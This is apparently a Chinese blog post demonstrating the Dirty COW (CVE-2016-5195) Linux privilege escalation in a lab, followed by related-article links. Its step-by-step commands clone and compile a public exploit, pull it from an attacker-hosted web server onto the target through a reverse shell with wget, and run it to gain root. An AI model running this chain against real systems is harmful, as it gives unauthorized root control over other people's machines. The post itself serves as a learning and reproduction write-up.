Dirty cow提权(脏牛)CVE-2016-5195 演示

最新推荐文章于 2024-05-08 13:52:39 发布
最新推荐文章于 2024-05-08 13:52:39 发布
阅读量388 收藏 2
点赞数
分类专栏: Kali 提权 文章标签: 安全 Dirty cow提权(脏牛)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WJ_11_13/article/details/127454976
版权
Kali 同时被 2 个专栏收录
15 篇文章 1 订阅
订阅专栏
提权
1 篇文章 0 订阅
订阅专栏

漏洞原理(脏牛)

 Linux内核的内存子系统在处理写入时复制时产生了竞争条件(指的是任务执行顺序异常,导致应用崩溃或者使得攻击者利用其漏洞进一步执行其他代码,最终攻击者可对其目标进行提权获得root权限)

提权

下载EXP

┌──(root㉿kali)-[~]
└─# git clone https://github.com/firefart/dirtycow.git
┌──(root㉿kali)-[~]
└─# ls 
Desktop  dirtycow  Documents  Downloads  jdk1.8.0_202  Music  Pictures  Public  Templates  Video                         
┌──(root㉿kali)-[~]
└─# cd dirtycow                         
┌──(root㉿kali)-[~/dirtycow]
└─# ls
dirty.c  README.md

gcc编译

┌──(root㉿kali)-[~/dirtycow]
└─# gcc -pthread dirty.c -o dirty -lcrypt   #使用gcc编译 -o意思是生成dirty文件            
┌──(root㉿kali)-[~/dirtycow]
└─# ls
dirty  dirty.c  README.md

设置执行权限

┌──(root㉿kali)-[~/dirtycow]
└─# chmod +x dirty

本地开启web服务便于将本地编译好的dirty文件传到目标机中

┌──(root㉿kali)-[~/dirtycow]
└─# systemctl start apache2.service

通过反弹的Shell将攻击机编译的dirty下载到目标机

$ cd /tmp       
$ pwd
/tmp
$ wget http://10.10.10.128/dirty
--2022-10-21 03:02:29--  http://10.10.10.128/dirty
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17512 (17K)
Saving to: 'dirty'

     0K .......... .......                                    100% 51.0M=0s

2022-10-21 03:02:29 (51.0 MB/s) - 'dirty' saved [17512/17512]

$ ls
dirty

权限提升获取系统管理员权限和密码

$ ./dirty ggbond             # ./dirty+自定义密码  执行dirty完成提权获取系统登录信息
最后才是真正获取到系统后台权限
爱吃仡坨
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dirtycowlinuxexp
03-25
dirtycowlinuxexp
温和的跳跃
01-25 448
本来我在研究docker逃逸的结果看到。那就研究这个吧。dirty crow ...... 都是内核那点事。。。。。
Linux常用六种方式
最新发布
qq_59102311的博客
05-08 1853
SUID(设置用户ID)是赋予文件的一种限,它会出现在文件拥有者限的执行位上,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限。为可执行文件添加suid限的目的是简化操作流程,让普通用户也能做一些高限才能做的的工作。但是如果某些现有的二进制文件和实用程序具有SUID限的话,就可以在执行时将升为root。原理:SUID的原理与Linux进程的UID有关,进程在运行的时候有以下三个UID:(A)Real UID:执行该进程的用户的UID。
lampiao靶场---
m0_66908617的博客
05-11 422
渗透测试前期准备攻击机:192.168.71.235(kali系统)靶机:192.168.71.191漏洞复现。
漏洞复现- - -CVE-2016-5195 Dirty Cow漏洞
weixin_67503304的博客
11-02 4595
本文主要讲解了漏洞的全过程及其修复建议。
DirtyCow漏洞复现(CVE-2016-5195)1
08-08
Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
CVE-2016-8655 Linux内核漏洞POC
11-18
CVE-2016-8655 Linux内核漏洞POC
CVE-2016-5195:CVE-2016-5195漏洞利用示例
05-10
dcow是漏洞CVE-2016-5195的可能利用。 在易受攻击的系统上以无特的用户身份运行该程序,它将修改/ etc / passwd文件,并强制输入密码“ dirtyCowFun”(SHA-512,但可以针对较旧的标准进行修改)。 如果成功执行...
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
dirtycow漏洞原理图
03-10
自己画的关于漏洞的原理图,个人感觉比较清晰,适合小白理解用
dirtycow()靶机渗透测试
yqa957的博客
03-12 2462
nmap扫描存活主机 nmap -sn 192.168.233.0/24 发现靶机192.168.233.133 扫描端口 nmap -sV -sC -sT -p- 192.168.233.133 御剑扫描 注入测试 手工注入—>确定注入点 判断列数 使用union all 手工注 查找对应位置 http://192.168.233.133/storypage_04.php?id=...
Dirty Pipe管道漏洞复现(CVE-2022-0847)
小千安全
05-06 779
攻击者通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通限的用户升到特 root这个漏洞作者将其命名为了 Dirty Pipe(管道),一看到这名字讲道理就让人想到了 Dirty Cow),这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。
cve-2016-5159)
热门推荐
haha1314的博客
07-22 2万+
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低限的用户可利用这一漏洞在本地进行 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高限,对只读内存映射进行访问。 竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统限,甚至可...
Linux(DirtyCow-CVE-2016-5195)本地漏洞复现
锋刃科技的博客
11-27 800
简介 Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 漏洞概述 Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取限。 影响版本 从 2007 年发布 2.6.22 版本开始,直到2016年10月18日为止,这中间发行的所有 Linux 系统都受影响 漏洞复现 当前用户为te
【安全学习笔记】本地
edu_aqniu的博客
07-13 336
本地 1.简介已实现本地低限登陆后,通过工具和漏洞获取更高限,实现对目标进一步控制 2.windows Admin为system 3.注入进程 4.抓包嗅探密码 windows:sniffpass 自动抓取网络流量中的明文密码包 linux:Dsniff 同sniffpass5.键盘记录 keylogger 木马 6.本地缓存密
Dirty Pipe linux内核漏洞分析(CVE-2022-0847)
weixin_51804748的博客
04-01 4790
漏洞原理 Pipe机制 本质上来说,管道(pipe)就是一种进程间通信的手段,让两个进程可以通过pipe 发送和接收数据。 Page Cache机制 磁盘的IO读写速度是很慢的,所以一般当我们访问一个磁盘文件的时候,首先会将其内容装载到物理内存中,后续的访问都是直接取内存中的副本来读取数据。因为一个文件的内存副本,后续可能会被很多进程打开使用。(想想是不是,平常我们的微信软件可能打开本地的一个文本,word软件也可能打开同一个文本)。为了保证大家都能快速的访问,Linux设计了这样一个Page Cache
渗透之
shy的博客
09-14 1349
1,确定系统版本 Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 2,新建低限的用户和切换到该用户 3,下载exp 下载地址:https://link.jianshu.com/?t=https%3A%2F%2Fgithub.com%2FFireFart%2Fdirtycow 4,编译 5,将编译好的exp上传到目标机上去 ./dirty新密码进行 ...
Dirty COW(CVE-2016-5195)
06-07
Dirty COW)是一种Linux内核漏洞,漏洞编号为CVE-2016-5195。攻击者可以利用该漏洞获取系统管理员限,进而控制整个系统。 Dirty COW漏洞源于Linux内核对Copy-On-Write(COW)机制的实现不当。攻击者可以通过修改系统中的共享库,以此触发内核中的缺陷,从而突破Linux系统的安全机制。 Dirty COW漏洞被发现后,Linux社区及时发布了修复补丁,建议用户及时更新系统。同时,用户还可以通过以下措施来防范漏洞的攻击: 1. 安装最新的系统补丁,包括内核和共享库等。 2. 禁用SUID/SGID限,即不允许普通用户以超级用户身份运行某些程序。 3. 避免在生产环境下使用过时的、未经验证的软件程序。 4. 控制系统对外开放的端口和服务,尽可能减少攻击面。 5. 定期进行安全审计和漏洞扫描,及时发现和修复安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值